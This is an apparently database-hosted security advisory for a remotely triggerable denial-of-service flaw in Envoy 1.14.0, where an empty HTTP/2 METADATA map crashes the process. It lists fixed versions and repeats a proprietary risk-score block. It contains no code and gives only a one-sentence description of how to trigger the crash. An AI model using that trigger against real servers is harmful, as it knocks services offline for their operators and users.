Primary

Context

Envoy HTTP/2 Metadata Map Assertion Failure Leading to Denial-of-Service

Vulnerability

Patched

A denial-of-service vulnerability exists in Envoy version 1.14.0. When an empty METADATA map is sent in an HTTP/2 request, it triggers a reachable assertion, causing the application to crash. This issue is remotely exploitable.

Impact

Exploitation of this vulnerability leads to a crash of the Envoy process, causing a denial-of-service condition.

Reproduction

To reproduce this vulnerability, send an HTTP/2 request with a METADATA frame that contains an empty METADATA map. This will cause Envoy to crash.

Remediation

Users can upgrade to Envoy versions 1.14.7, 1.15.4, 1.16.3, 1.17.2, or 1.18.0 to address this vulnerability. Alternatively, HTTP/2 Metadata frame support can be disabled.

Added: Apr 7, 2026, 11:28 AM

Updated: Apr 7, 2026, 11:28 AM

Vulnerability Rating

Custom Algorithm

spread

7.3

impact

2.5

exploitability

9.1

remediation

7.9

relevance

0.0

threat

4.8

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

7.3

impact

2.5

exploitability

9.1

remediation

7.9

relevance

0.0

threat

4.8

urgency

2.9

incentive

8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Envoy HTTP/2 Metadata Map Assertion Failure Leading to Denial-of-Service

Vulnerability

Impact

Reproduction

Remediation

Affected Products

Envoy

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating